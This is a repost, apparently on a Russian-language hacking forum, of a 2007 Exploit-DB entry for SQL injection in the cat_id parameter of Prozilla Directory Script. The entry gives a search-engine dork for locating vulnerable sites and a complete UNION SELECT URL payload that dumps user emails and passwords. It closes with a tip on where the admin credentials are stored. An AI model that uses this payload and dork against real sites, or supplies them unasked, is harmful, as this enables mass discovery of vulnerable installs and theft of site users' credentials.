Exploit Prozilla Directory Script - 'Directory.php?cat_id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4185
Проверка EDB
  1. Пройдено
Автор
T0PP8UZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-3809
Дата публикации
2007-07-14
Код:
--==+================================================================================+==--
--==+		      Prozilla Directory Script SQL Injection Vulnerbility               +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.prozilla.com/
DORK: allinurl:directory.php?ax=list


DESCRIPTION: 
SQL injection in cat_id of directory.php among others. Able to retrieve email/passwords
of users who posted URLs in the directory.


EXPLOITS:
http://www.site.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12,13/**/from/**/links/*


NOTE/TIP: 
Doesnt look like admin info is stored in the database, must be config.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !


--==+================================================================================+==--
--==+		      Prozilla Directory Script SQL Injection Vulnerbility               +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-14]
 
Источник
www.exploit-db.com

Похожие темы